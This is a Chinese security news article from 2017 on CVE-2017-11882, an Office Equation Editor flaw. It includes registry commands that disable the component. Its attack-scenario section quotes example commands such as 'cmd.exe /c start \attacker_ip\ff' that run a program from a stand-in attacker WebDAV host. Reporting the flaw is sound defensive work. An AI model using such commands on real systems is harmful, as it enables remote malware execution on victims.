微软Office曝存在17年之久的“全版本影响”老洞,无需用户交互实现恶意程序远程植入

当人们仍在着急处理“没有补丁”的微软MS Office内置DDE功能威胁时,有研究人员又发现了Office的另一个严重漏洞,攻击者可以利用该漏洞,无需受害者用户交互,远程向目标系统植入恶意软件。该漏洞属于内存破坏型漏洞,可影响微软过去17年发布的所有MS Office版本软件,包括最新的Office 365,漏洞利用能成功在包括Windows 10在内的所有微软Windows操作系统中实现。

CVE-2017-11882漏洞POC样本分析:

漏洞信息

该漏洞由Embedi公司研究员发现,漏洞可导致远程代码执行、未授权认证绕过、无需用户交互的远程恶意程序植入。目前漏洞编号CVE-2017-11882,主要漏洞部件为Office中的自带公式编辑器EQNEDT32.EXE。

由于不正确的内存操作,组件EQNEDT32.EXE会无法正确处理内存中的执行对象,这种破坏条件,致使攻击者可在当前系统登录用户环境下,利用Office远程植入恶意代码或其它恶意程序。

微软在Microsoft Office 2000中就引入了EQNEDT32.EXE组件,并保留至Microsoft Office 2007之后发布的所有Office 版本中,以确保新旧软件的文档兼容。

该漏洞的成功利用需要受害者用Office打开攻击者特制的恶意文档,如果与微软的内核提权漏洞(如CVE-2017-11847)组合利用,攻击者将会获得受害者目标系统的完全控制权。以下视频是在Windows 7,8,10系统中该漏洞的成功实现过程演示:

漏洞技术分析

详情查看Embedi分析报告《微软的难言之隐-你所不知道的漏洞》

可能的攻击场景

Embedi研究者列举了以下几种该漏洞的可攻击利用场景:

当插入一些OLE(对象链接嵌入)实体时,可能会触发该漏洞,实现一些恶意命令的执行,如向某个攻击者架设网站下载执行恶意程序等。 最直接有效的漏洞利用方式就是,访问攻击者架设或控制的WebDAV服务器,并执行其中的运行程序。 不过,攻击者还能利用该漏洞执行cmd.exe /c start \attacker_ip\ff类似恶意命令,配合入侵或启动WebClient服务。 另外,攻击者还能使用诸如\attacker_ip\ff\1.exe的命令向受害者系统中执行恶意程序,恶意程序的启动机制与\live.sysinternals.com\tools service方式类似。

缓解和修复措施

在11月的补丁修复周期中,微软针对该漏洞修改了EQNEDT32.EXE组件的内存处理机制,并发布了多个漏洞补丁更新,强烈建议用户及时进行下载更新。

鉴于EQNEDT32.EXE组件的不确定隐患,我们建议用户通过以下注册表命令来对其进行禁用:

reg add “HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

如果在64位操作系统中安装了32位的MS Office软件,命令如下:

reg add “HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2017-11-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏林德熙的博客

cant found Microsoft.VSSDK.BuildTools.15.0.26201

可以打开 EncodingNormalior\packages 文件夹,删除所有的文件,然后重新编译。

791
来自专栏小白课代表

软件分享 | Office 2019 安装教程。

Microsoft Office 2019 正式版已经发布有一段时间了,今天更新一下Office 2019的安装教程。

2705
来自专栏九彩拼盘的叨叨叨

学习纲要:代码编辑器

873
来自专栏张善友的专栏

ADO.NET的弹性连接控制[ADO.NET idle connection resiliency]

ADO.NET连接SQL Server有时候联机会无故的中断 (例如闲置过久或是交易时间太长等因素),这时又要重新连接,在.NET Framework 4.5之...

2039
来自专栏施炯的IoT开发专栏

Windows 10 IoT Serials 3 - Windows 10 IoT Core Ardunio Wiring Mode

    Maker社区和智能硬件的朋友一定知道Arduino,很多3D打印机都是用它做的。为了迎合这一大块市场,微软在基于Intel Galileo的Windo...

1898
来自专栏静晴轩

Mac必备软件集之Brew

Brew~安装开发工具链的神器:brew 又叫Homebrew,是Mac OSX上的软件包管理工具,能在Mac中方便的 安装/查询/卸载 软件, 只需要一个命令...

4613
来自专栏SDNLAB

LINC switch系列之架构分析与源码探索

前言 LINC switch是一个由flowforwarding. org主导开发的一款纯openflow交换机,目的是发展和评估openflow协议1.2,1...

3096
来自专栏.NET后端开发

ADO.NET入门教程(二)了解.NET数据提供程序

摘要       在上一篇文章《你必须知道的ADO.NET(一) 初识ADO.NET》中,我们知道ADO.NET的两大核心组件分别是Data Provider和...

42411
来自专栏SDNLAB

Microsoft在Windows Server 2019中的重大改进

在Windows Server 2019中,Microsoft为其屏蔽虚拟机安全控制改进了弹性和冗余的问题,该Shielded VMs于Windows Serv...

2203
来自专栏晓晨的专栏

ABP从入门到精通(1):aspnet-zero-core项目启动及各项目源码说明

1914

扫码关注云+社区

领取腾讯云代金券